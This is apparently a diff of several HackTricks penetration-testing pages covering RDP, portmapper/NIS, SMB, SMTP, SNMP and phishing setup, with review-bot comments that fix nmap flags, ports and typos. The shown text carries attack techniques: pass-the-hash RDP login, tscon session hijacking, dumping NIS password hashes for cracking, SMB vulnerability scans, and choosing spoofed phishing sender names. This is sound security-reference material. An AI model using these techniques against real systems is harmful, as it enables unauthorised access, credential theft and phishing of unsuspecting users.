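Review bot: `nmap --scripts "pop3-capabilities or pop3-ntlm-info" -sV -port 110 {IP}` uses two options nmap does not have; the flags are `--script` (singular) and `-p`, so the command errors out as written. Use `nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110 {IP}`.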


@ -20,7 +20,7 @@ xfreerdp /u:[domain\]<username> /p:<password> /v:<IP>
xfreerdp /u:[domain\]<username> /pth:<hash> /v:<IP>
```
### [Brute force](../brute-force.md#rdp)
### [Brute force](../brute-force.md#rdp)
**Be careful, you could lock accounts**
@ -42,7 +42,7 @@ It checks the available encryption and DoS vulnerability \(without causing DoS t
## Post-Exploitation
{% embed url="https://github.com/JoelGMSec/AutoRDPwn" %}
{% embed url="https://github.com/JoelGMSec/AutoRDPwn" caption="" %}
### Launch CMD with other cretentials so they are used in the network
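Review bot: `cretentials` in the heading should be `credentials`.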
@ -68,7 +68,7 @@ query user
tscon <ID> /dest:<SESSIONNAME>
```
Now you will be inside the selected RDP session and you will have impersonate a user using only Windows tools and features.
Now you will be inside the selected RDP session and you will have impersonate a user using only Windows tools and features.
**Important**: When you access an active RDP sessions you will kickoff the user that was using it.
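Review bot: whitespace-only pair; in the context sentences, "you will have impersonate a user" should read "you will have impersonated a user" and "kickoff" should be "kick off".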
@ -97,7 +97,7 @@ net localgroup "Remote Desktop Users" UserLoginName /add
## HackTricks Automatic Commands
```
```text
Protocol_Name: RDP #Protocol Abbreviation if there is one.
Port_Number: 3389 #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol #Protocol Abbreviation Spelled out
@ -114,3 +114,4 @@ Name: Nmap
Description: Nmap with RDP Scripts
Command: """nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}"""
```


@ -18,7 +18,7 @@ rpcinfo irked.htb
nmap -sSUC -p111 192.168.10.1
```
Sometimes it doesn't give you any information, in other occasions you will get something like this:
Sometimes it doesn't give you any information, in other occasions you will get something like this:
![](../.gitbook/assets/image%20%2863%29.png)
@ -42,7 +42,6 @@ If you find the service `ypbind`running:
You can try to exploit it. Anyway, first of all you will **need to guess the NIS "domain name"** of the machine \(when NIS is installed it's configured a "domain name"\) and **without knowing this domain name you cannot do anything**.
Upon obtaining the NIS domain name for the environment \(example.org in this case\), use the ypwhich command to ping the NIS server and ypcat to obtain sensitive material. You should feed encrypted password hashes into John the Ripper, and once cracked, you can use it to evaluate system access and privileges.
```bash
@ -85,7 +84,7 @@ More information in [https://medium.com/@sebnemK/how-to-bypass-filtered-portmapp
## HackTricks Automatic Commands
```
```text
Protocol_Name: Portmapper #Protocol Abbreviation if there is one.
Port_Number: 43 #Comma separated if there is more than one.
Protocol_Description: PM or RPCBind #Protocol Abbreviation Spelled out
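Review bot: `Port_Number: 43` is the WHOIS port carried over from another template; Portmapper/rpcbind listens on 111, which is also the port the Nmap command in this file uses (`-p 111`).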
@ -106,3 +105,4 @@ Name: nmap
Description: May give netstat-type info
Command: """nmap -sSUC -p 111 {IP}"""
```


@ -446,7 +446,7 @@ Which are used by some browsers and tools \(like Skype\)
## HackTricks Automatic Commands
```
```text
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
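Review bot: `Port_Number: 137,138,139` omits 445, the port SMB uses directly over TCP and the one the vuln-scan command in this file targets (`-p 139,445`); 137 and 138 are NetBIOS name/datagram services rather than SMB itself. Suggest `139,445` (with the NetBIOS ports listed separately if wanted).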
@ -497,3 +497,4 @@ Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: """nmap --script smb-vuln* -Pn -p 139,445 {IP}"""
```


@ -441,7 +441,7 @@ submit.cf
## HackTricks Automatic Commands
```
```text
Protocol_Name: SMTP #Protocol Abbreviation if there is one.
Port_Number: 25,465,587 #Comma separated if there is more than one.
Protocol_Description: Simple Mail Transfer Protocol #Protocol Abbreviation Spelled out
@ -474,3 +474,4 @@ Name: Find MX Servers:
Description: Find MX servers of an organization
Command: """dig +short mx {Domain_Name}"""
```


@ -183,7 +183,7 @@ If there is an ACL that only allows some IPs to query the SMNP service, you can
## HackTricks Automatic Commands
```
```text
Protocol_Name: SNMP #Protocol Abbreviation if there is one.
Port_Number: 161 #Comma separated if there is more than one.
Protocol_Description: Simple Network Managment Protocol #Protocol Abbreviation Spelled out
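Review bot: `Simple Network Managment Protocol` should be `Simple Network Management Protocol`.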
@ -208,3 +208,4 @@ Name: Nmap
Description: Nmap snmp (no brute)
Command: nmap --script "snmp* and not snmp-brute" {IP}
```
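Review bot: `nmap --script "snmp* and not snmp-brute" {IP}` runs a default TCP scan, on which the SNMP scripts never trigger because SNMP is UDP/161; add `-sU -p 161` so the scripts actually run.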


@ -339,7 +339,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke
* Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
* You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
![](../.gitbook/assets/image%20%28253%29%20%281%29%20%282%29%20%281%29%20%281%29%20%282%29%20%282%29%20%283%29.png)
![](../.gitbook/assets/image%20%28253%29%20%281%29%20%282%29%20%281%29%20%281%29%20%282%29%20%282%29%20%283%29%20%283%29.png)
{% hint style="info" %}
It's recommended to use the "**Send Test Email**" functionality to test that everything is working.